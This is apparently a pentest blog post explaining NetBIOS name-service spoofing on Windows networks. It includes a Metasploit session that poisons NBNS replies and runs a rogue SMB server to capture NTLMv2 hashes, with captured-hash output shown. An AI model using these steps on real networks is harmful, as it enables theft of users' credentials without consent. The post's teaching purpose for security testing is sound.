There have been several posts regarding NetBIOS spoofing, and i thought i would write something up regarding it.
When a windows machine tries to access a resource on the network it will try and resolve the name of the resource to an IP address. It does this by first searching it’s host file, and if that fails (and generally does), it will then try DNS. Well DNS doesnt have records for everything, so the windows machine tries NetBIOS and if you dont have a WINS server setup, it will send a broadcast message asking if anyone knows about that resource. Perfect, we can respond with a machine that we control.
How often to machines fall back to NetBIOS queries? Laptops that are part of a domain on a different wireless network often query for resources. Often companies have a internal website configured. Also most web browsers when you perform a search they have to determine if you are trying to access a local resource or performing a search.
msf auxiliary(smb) > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
Module options (auxiliary/spoof/nbns/nbns_response):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
REGEX .* yes Regex applied to the NB Name to determine if spoofed reply is sent
SPOOFIP 192.168.1.108 yes IP address with which to poison responses
TIMEOUT 500 yes The number of seconds to wait for new data
msf auxiliary(nbns_response) > run
[*] Auxiliary module execution completed
[*] NBNS Spoofer started. Listening for NBNS requests...
msf auxiliary(nbns_response) > use auxiliary/server/capture/smb
msf auxiliary(smb) > show options
Module options (auxiliary/server/capture/smb):
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in JOHN format
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 445 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
msf auxiliary(smb) > set JOHNPWFILE /pentest/passwords/wordlists/darkc0de.lst
JOHNPWFILE => /pentest/passwords/wordlists/darkc0de.lst
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) > [*] 2012-01-29 09:45:40 -0500
NTLMv2 Response Captured from 192.168.1.123:2861
USER:keith DOMAIN:cheeze-it OS: LM:
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:******hash************* NT_CLIENT_CHALLENGE:****************************************************
hey this post was quite informative to me. looking forward to your next post Thankyou.